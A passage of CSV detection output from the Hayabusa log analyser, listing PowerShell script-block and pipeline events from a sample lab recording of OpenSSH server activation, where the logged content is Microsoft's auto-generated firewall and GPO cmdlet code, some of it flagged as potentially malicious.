[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.894 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.896 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.897 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.898 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 